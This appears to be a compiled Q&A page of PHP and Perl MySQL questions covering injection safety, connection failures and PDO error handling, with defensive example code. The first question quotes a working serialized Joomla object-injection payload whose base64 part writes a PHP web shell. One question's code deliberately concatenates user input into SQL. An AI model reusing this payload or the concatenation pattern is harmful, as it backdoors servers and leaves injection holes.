SQL injection Am I safe? - mysql

Today I saw this in my sql database:
| *some data* | }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:
{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:
{}s:8:"feed_url";s:207:"
eval(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2xkcC5waHAnLCdFRTlBQUVFQzREOEU0NDM5Mjk5MDQ2QjhDREIzRjc4MiA8P3BocCBAZXZhbCgkX1BPU1RbImZrIl0pOycpOw));
JFactory::getConfig();
exit;";
s:19:"cache_name_function";
s:6:"assert";s:5:"cache"
;b:1;s:11:"cache_class";
O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}� |
I'm using this code to put data into the database:
<?php
// Create connection
$conn = new mysqli($servername, $username, $password, $dbname);
// Check connection
if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}
// VALUE and DEVICE are bound parameters; the table name ($TABLE) is
// interpolated into the SQL text, because identifiers cannot be bound
$stmt = $conn->prepare("INSERT INTO $TABLE (VALUE, DEVICE) VALUES (?, ?)");
$stmt->bind_param("ss", $VALUE, $DEVICE);
$stmt->execute();
$stmt->close();
$conn->close();
?>
Am I safe?
Is my code secure, or should I add another layer of security?

Related

Remote Connection to Server failed

I want to connect to a server hosted online.
My code connects to localhost, but when I change the values to the hosted server it gives me an error:
Warning: mysqli_connect(): (HY000/2002): No connection could be made because the target machine actively refused it.
<?php
$servername = "zamokuhleWeb.co.za";
$username = "*****";
$password = "****";
// Create connection
$conn = mysqli_connect($servername, $username, $password);
// Check connection
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
?>
I want to access the database and get certain information from it.
<?php
$servername = "localhost";
$username = "*****";
$password = "****";
// Create connection
$conn = mysqli_connect($servername, $username, $password);
// Check connection
if (!$conn) {
die("Connection failed: " . mysqli_connect_error());
}
echo "Connected successfully";
?>

How to forward a connection failed MySQL to a error page (500)

We made a simple PHP webpage with an InnoDB table, to monitor whether InnoDB goes down.
When InnoDB / MySQL goes down we get an error: Connection failed: Can't connect to local MySQL server through socket '/var/lib/mysql/mysql.sock' (2 "No such file or directory")
But we want to forward this to a custom error. Like: InnoDB IS DOWN!!!
Any suggestions how we can do this?
<?php
$servername = "localhost";
$username = "root";
$password = "**************";
$dbname = "innodb";
// Create connection
$conn = new mysqli($servername, $username, $password, $dbname);
// Check connection
if ($conn->connect_error) {
die("Connection failed: " . $conn->connect_error);
}
$sql = "SELECT status FROM monitoring";
$result = $conn->query($sql);
if ($result->num_rows > 0) {
// output data of each row
while($row = $result->fetch_assoc()) {
echo "De status van InnoDB is: " . $row["status"]. "<br>";
}
} else {
echo "0 results";
}
$conn->close();
?>
It's simple, use something like this
<?php
// Configuration of database
// Check connection
if ($conn->connect_error) {
// die("InnoDB IS DOWN");
// OR
echo "<p>InnoDB IS DOWN</p>";
exit();
}
// Rest of your code
Or you may include an HTML page inside the if ($conn->connect_error) condition instead, like:
// Check connection
if ($conn->connect_error) {
include 'error_page.html';
exit();
}
// Rest of your code

Mysql error while updating data using perl language

Update function
I am getting an error while updating data in the database.
sub update
{
my $sql = "UPDATE Data SET NAME = ?, ADDRESS=?, PHONE_NO=?,
DATE_OF_JOINING=?, ROLE_ASSIGN=?, SALARY=? WHERE ID = ?";
my $sth = $dbh->prepare($sql);
print("Enter ID to update : ");
chomp(my $ID = <STDIN>);
print("NAME : ");
chomp(my $NAME = <STDIN>);
print("ADDRESS : ");
chomp(my $ADDRESS = <STDIN>);
print("PHONE_NO : ");
chomp(my $PHONE_NO = <STDIN>);
print("DATE_OF_JOINING : ");
chomp(my $DATE_OF_JOINING = <STDIN>);
print("ROLE_ASSIGN : ");
chomp(my $ROLE_ASSIGN = <STDIN>);
print("SALARY : ");
chomp(my $SALARY = <STDIN>);
$sth->bind_param(1,$NAME);
$sth->bind_param(2,$ADDRESS);
$sth->bind_param(3,$PHONE_NO);
$sth->bind_param(4,$DATE_OF_JOINING);
$sth->bind_param(5,$ROLE_ASSIGN);
$sth->bind_param(6,$SALARY);
$sth->bind_param(7,$ID);
$sth->execute();
print("The record has been updated successfully!");
$sth->finish();
$dbh->disconnect();
}
After executing the above function, when I try to view the updated data:
sub query_links
{
    my ($dbh) = @_;
    my $sql = "SELECT * FROM Data";
    my $sth = $dbh->prepare($sql) or die $DBI::errstr;
    $sth->execute() or die $DBI::errstr;
    $sth->dump_results();
    $sth->finish();
}
Error:
DBD::mysql::st execute failed: MySQL server has gone away at mini.plx line 94,
<STDIN> line 9.MySQL server has gone away
The error message means that the connection to your database has been lost.
You don't show us any code that creates your connection, so it's hard to know what might have gone wrong there. You might consider adding the mysql_auto_reconnect flag when connecting to the database.
my $dbh = DBI->connect($dsn, $user, $password, {
mysql_auto_reconnect => 1,
});
You can also change this setting after the database connection has been set up.
$dbh->{mysql_auto_reconnect} = 1;
Update: As ikegami points out in a comment, you disconnect from the database at the end of update() - and you don't show any code demonstrating that you reconnect before using the connection again in query_links(). That will cause this problem.

getting error back from Prepared statement in case sql injection

I'm trying to test my prepared statement, which is protecting one field, to get the error message in case of SQL injection. So far I have tried thousands of attacks, and all of the values I gave were accepted. Am I using a wrong syntax or attack? I can't see where the problem is. Here is my code:
try {
    // $host = "localhost";
    // $username = "root";
    // $password = "root";
    // $db_name = "pokemon";
    $conn = new PDO('mysql:host='.$host.';dbname='.$db_name.';', $username, $password);
    // set the PDO error mode to exception
    $conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $meldung = "";
    $name = $_REQUEST['name'];
    $gewicht = $_REQUEST['Gewicht'];
    $größe = $_REQUEST['Größe'];
    $spezies = $_REQUEST['Spezies'];
    $stufe = $_REQUEST['Stufe'];
    $atacke = $_REQUEST['Attacke'];
    $array = explode(',', $_REQUEST['Attacke']);
    // Only :Name is a bound parameter; Gewicht, Größe, Spezies and Stufe are
    // concatenated into the SQL text, so only the Name field is protected
    $stmt = $conn->prepare("INSERT INTO Pokemon (`Name`,`Gewicht`,`grosse`,`spezies`,`stufe`) VALUES (:Name, '".$gewicht."', '".$größe."', '".$spezies."', '".$stufe."')");
    $stmt->bindParam(':Name', $name);
    // $stmt->bindParam(':Gewicht', $gewicht);
    // $stmt->bindParam(':grosse', $größe);
    // $stmt->bindParam(':spezies', $spezies);
    // $stmt->bindParam(':stufe', $stufe);
    $stmt->execute();
}
catch(PDOException $e)
{
    $meldung = "Error: " . $e->getMessage();
    echo $meldung;
}
thanks
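As an added example (not code from any of the posts above), serving both the first question (mysqli with an interpolated $TABLE) and this one (PDO with only :Name bound): it uses PDO with an in-memory SQLite database so it runs without a MySQL server, and the table, columns and sample values are constructed. The '?' placeholders behave the same way against MySQL.

```php
<?php
// Added example, not from any post on this page. PDO + in-memory SQLite so it
// runs offline; the table/column names and the sample payload are constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE readings (value TEXT, device TEXT)');

// Identifiers cannot be bound, so a table name chosen at runtime must be
// matched against a fixed allowlist before it is interpolated into the SQL.
const ALLOWED_TABLES = ['readings', 'events'];

function insertReading(PDO $db, string $table, string $value, string $device): void
{
    if (!in_array($table, ALLOWED_TABLES, true)) {
        throw new InvalidArgumentException("table not allowed: $table");
    }
    // Every value is a bound parameter: it is sent as data and never parsed as SQL.
    $stmt = $db->prepare("INSERT INTO $table (value, device) VALUES (?, ?)");
    $stmt->execute([$value, $device]);
}

// Constructed input shaped like the serialized object in the first question,
// with double quotes, braces, semicolons and an apostrophe.
$payload = "}__test|O:21:\"JDatabaseDriverMysqli\":1:{s:2:\"fc\";s:6:\"O'Neil\";}";

insertReading($db, 'readings', $payload, 'sensor-1');
$stored = $db->query('SELECT value FROM readings')->fetchColumn();
// With binding, the stored value is byte-for-byte the input: it was data, not SQL.
echo ($stored === $payload ? 'stored verbatim' : 'stored altered') . "\n";

// A table name outside the allowlist is rejected before any SQL is built.
try {
    insertReading($db, 'readings2', 'x', 'y');
} catch (InvalidArgumentException $e) {
    echo $e->getMessage() . "\n";
}

// The same input concatenated into the statement, as the question above does
// for Gewicht, Größe, Spezies and Stufe, is parsed as SQL and fails at the apostrophe.
try {
    $db->exec("INSERT INTO readings (value, device) VALUES ('$payload', 'sensor-1')");
} catch (PDOException $e) {
    echo 'concatenated insert failed: ' . $e->getMessage() . "\n";
}
```

The check for "is my prepared statement working" is therefore not an error message but a round trip: a value containing quotes is stored unchanged, and no input can change the statement's shape.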

Detecting error/invalid/illegal queries using PDO driver (MySQL + PHP)

I just changed all my code from the old mysql driver to PDO.
So far I find that a lot of basic functionality doesn't exist! E.g. no equivalent of mysql_num_rows, and so on (but that's not the point of this post :/ )
Usually with mysql driver, I'd do:
$result = mysql_query($query);
if(!$result){
displayError(mysql_error());
}
How do you do similar thing using PDO?
Have a look at the documentation; there are 3 modes:
PDO::ERRMODE_SILENT (default)
PDO::ERRMODE_WARNING
PDO::ERRMODE_EXCEPTION
I suggest you enable the last, which causes an exception to be thrown on error :
$pdo = new PDO($dsn,$user,$pass,$options); // Example connection
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
then surround your statement in a try/catch block
try {
// your query here
} catch (PDOException $e) {
echo 'Query failed: ' . $e->getMessage();
}
Separate note: mysql_num_rows in PDO:
$sql = "SELECT count(*) FROM `table` WHERE x = y";
$result = $con->prepare($sql);
$result->execute();
$number_of_rows = $result->fetchColumn();
Use try { } catch {}
<?php
$dsn = 'mysql:dbname=testdb;host=127.0.0.1';
$user = 'dbuser';
$password = 'dbpass';
try {
$dbh = new PDO($dsn, $user, $password);
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
} catch (PDOException $e) {
echo 'Connection failed: ' . $e->getMessage();
}
?>
Reference
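An added example (not from any of the answers above) that combines the InnoDB-down question with the PDO error-mode answer: exceptions are enabled at construction, the driver's message is logged server-side, and the client gets a 500 status with a generic page. The DSN, credentials, page file and monitoring table are hypothetical.

```php
<?php
// Added example, not from any post on this page. DSN, credentials, the
// error page file and the monitoring table are hypothetical.
const ERROR_PAGE = __DIR__ . '/error_page.html';

function connectDb(string $dsn, string $user, string $pass): PDO
{
    // ERRMODE_EXCEPTION set at construction: the constructor, prepare(),
    // query() and execute() all throw PDOException instead of returning false.
    return new PDO($dsn, $user, $pass, [
        PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_TIMEOUT => 2, // don't hang the monitoring page while the server is down
    ]);
}

function failWith500(PDOException $e): void
{
    // The driver's full message (socket path, host, SQLSTATE) goes to the server log only.
    error_log('database unavailable: ' . $e->getMessage());
    // The client gets a 500, so uptime checks register the outage, plus a
    // generic page instead of the driver text.
    http_response_code(500);
    if (is_file(ERROR_PAGE)) {
        readfile(ERROR_PAGE);
    } else {
        echo "<p>InnoDB IS DOWN</p>\n";
    }
    exit(1);
}

try {
    $db = connectDb('mysql:host=127.0.0.1;dbname=innodb', 'monitor', 'secret');
    $stmt = $db->query('SELECT status FROM monitoring');
    foreach ($stmt as $row) {
        echo 'InnoDB status: ' . htmlspecialchars($row['status']) . "<br>\n";
    }
} catch (PDOException $e) {
    // Reached when the connection fails (server down, socket missing) or a query errors.
    failWith500($e);
}
```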